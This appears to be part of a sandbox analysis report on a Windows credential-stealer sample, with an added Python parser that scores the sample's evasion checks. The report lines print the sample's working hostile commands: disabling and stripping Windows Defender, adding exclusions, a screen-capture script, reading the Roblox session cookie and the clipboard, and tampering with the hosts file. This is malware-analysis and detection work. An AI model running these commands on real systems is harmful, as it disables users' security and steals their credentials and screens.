              Source: C:\Users\user\Desktop\phost.exe Code function: 0_2_00007FF62CC8A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\user\Desktop\phost.exe Code function: 0_2_00007FF62CC934F0 GetProcessHeap
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug (9 entries)
              Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug (5 entries)
              Source: C:\Users\user\Desktop\phost.exe Code function: 0_2_00007FF62CC8A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\user\Desktop\phost.exe Code function: 0_2_00007FF62CC7C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Users\user\Desktop\phost.exe Code function: 0_2_00007FF62CC7D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\user\Desktop\phost.exe Code function: 0_2_00007FF62CC7D37C SetUnhandledExceptionFilter
              Source: C:\Users\user\Desktop\phost.exe Code function: 1_2_00007FF62CC8A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\user\Desktop\phost.exe Code function: 1_2_00007FF62CC7C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe Code function: 105_2_00007FF6BBD14C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe Code function: 105_2_00007FF6BBD0B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe Code function: 105_2_00007FF6BBD0B6D8 SetUnhandledExceptionFilter
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe Code function: 105_2_00007FF6BBD0A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
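The observations in this section fall into four families: the ip-api.com hosting lookup, WMI enumeration of hardware that a sandbox rarely fakes, long or repeated sleeps, and hypervisor guest-tool names held in memory. The following is an added example, not code from the Joe Sandbox report or from Blank Grabber: a small parser for lines in the report's own "Source: <process> <observation>" layout that folds them into a per-family summary, so an analyst can score a report (or a batch of them) without reading every line. SAMPLE_LINES are constructed to mirror the report's format; the Win32_* class list and process-name list are taken from what this report shows.

```python
"""Triage helper for the evasion observations listed in this section.

Added example, not code from the Joe Sandbox report or from Blank Grabber.
It parses "Source: <process> <observation>" lines in the report's layout and
summarises the environment checks they describe. SAMPLE_LINES are constructed.
"""
import re
from collections import Counter
from dataclasses import dataclass, field

# WMI classes the sample enumerates; together they fingerprint the hardware
# (adapters/MACs, BIOS, SMBIOS UUID, CPU, RAM) a sandbox is unlikely to fake.
VM_REVEALING_WMI_CLASSES = {
    "Win32_NetworkAdapter", "Win32_NetworkAdapterConfiguration",
    "Win32_BIOS", "Win32_ComputerSystemProduct", "Win32_ComputerSystem",
    "Win32_Processor",
}

# Guest-tool process names seen as strings in the sample's memory. "Hyper-V"
# is deliberately not listed: "Hyper-V RAW" is a Winsock protocol name that
# appears on ordinary Windows 10+ hosts (it came from getmac.exe here).
HYPERVISOR_PROCESS_NAMES = {
    "vboxservice", "vboxtray", "vmtoolsd", "vmwareuser", "vmwaretray",
    "vmwareservice", "vmware", "vmusrvc", "vmsrvc", "qemu-ga",
}

HTTP_RE = re.compile(
    r"HTTP traffic detected: (?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]\s*Host: (?P<host>[\w.-]+)")
WMI_RE = re.compile(r"WMI Queries: IWbemServices::\w+ - (?P<ns>[\w\\]+) : (?P<query>.+)$")
MEMSTR_RE = re.compile(r"Binary or memory string: (?P<s>.+)$")
SLEEP_RE = re.compile(
    r"Thread sleep (?:count: (?P<count>\d+) > 30|time: (?P<secs>-?\d+)s >= -30000s)")


@dataclass
class EvasionSummary:
    hosting_lookups: list = field(default_factory=list)   # (host, path) pairs
    wmi_classes: Counter = field(default_factory=Counter)  # class -> query count
    vm_strings: set = field(default_factory=set)
    sleep_loops: int = 0    # "sleep count > 30": many short sleeps in a loop
    long_sleeps: int = 0    # "sleep time >= 30000s": one very long wait

    def score(self) -> int:
        """One point per evasion family present (0..4)."""
        return sum([
            bool(self.hosting_lookups),
            len(self.wmi_classes) >= 3,          # broad hardware fingerprinting
            bool(self.vm_strings),
            (self.sleep_loops + self.long_sleeps) > 0,
        ])


def parse_report_lines(lines):
    """Fold report observation lines into an EvasionSummary."""
    summary = EvasionSummary()
    for raw in lines:
        line = raw.strip()
        if not line.startswith("Source:"):
            continue
        if (m := HTTP_RE.search(line)):
            # ip-api.com's "hosting" field is true for datacenter/colocation
            # ranges, which is where most sandboxes live.
            if m["host"] == "ip-api.com" and "fields=hosting" in m["path"]:
                summary.hosting_lookups.append((m["host"], m["path"]))
        elif (m := WMI_RE.search(line)):
            for cls in re.findall(r"Win32_\w+", m["query"]):
                if cls in VM_REVEALING_WMI_CLASSES:
                    summary.wmi_classes[cls] += 1
        elif (m := MEMSTR_RE.search(line)):
            # strings such as "fecodevmware" or "d2qemu-ga" carry a length or
            # reference prefix in the dump, so match on the suffix
            token = m["s"].strip().lower().strip("()")
            for name in HYPERVISOR_PROCESS_NAMES:
                if token.endswith(name):
                    summary.vm_strings.add(name)
        elif (m := SLEEP_RE.search(line)):
            if m["count"]:
                summary.sleep_loops += 1
            else:
                summary.long_sleeps += 1
    return summary


# Constructed sample in the report's layout (not copied from the report).
SAMPLE_LINES = [
    "Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.3",
    "Source: C:\\Windows\\System32\\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\\cimv2 : Win32_NetworkAdapter",
    "Source: C:\\Windows\\System32\\wbem\\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct",
    "Source: C:\\Windows\\System32\\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\\cimv2 : Win32_BIOS",
    "Source: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe TID: 7404 Thread sleep count: 8399 > 30",
    "Source: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe TID: 7496 Thread sleep time: -9223372036854770s >= -30000s",
    "Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmtoolsd",
    "Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: d2qemu-ga",
    "Source: C:\\Windows\\System32\\svchost.exe File opened: PhysicalDrive0",
]

if __name__ == "__main__":
    s = parse_report_lines(SAMPLE_LINES)
    print(f"evasion score {s.score()}/4")
    print("hosting lookups:", s.hosting_lookups)
    print("WMI classes:", dict(s.wmi_classes))
    print("hypervisor strings:", sorted(s.vm_strings))
    print(f"sleep loops {s.sleep_loops}, long sleeps {s.long_sleeps}")
```

The score is deliberately coarse: a single WMI query is normal for many installers, so the WMI family only counts once three or more of the listed classes are touched, while a single ip-api.com `fields=hosting` lookup counts on its own because legitimate software has little reason to ask whether it is running in a datacenter.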

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\phost.exe File written: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Users\user\Desktop\phost.exe "C:\Users\user\Desktop\phost.exe"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
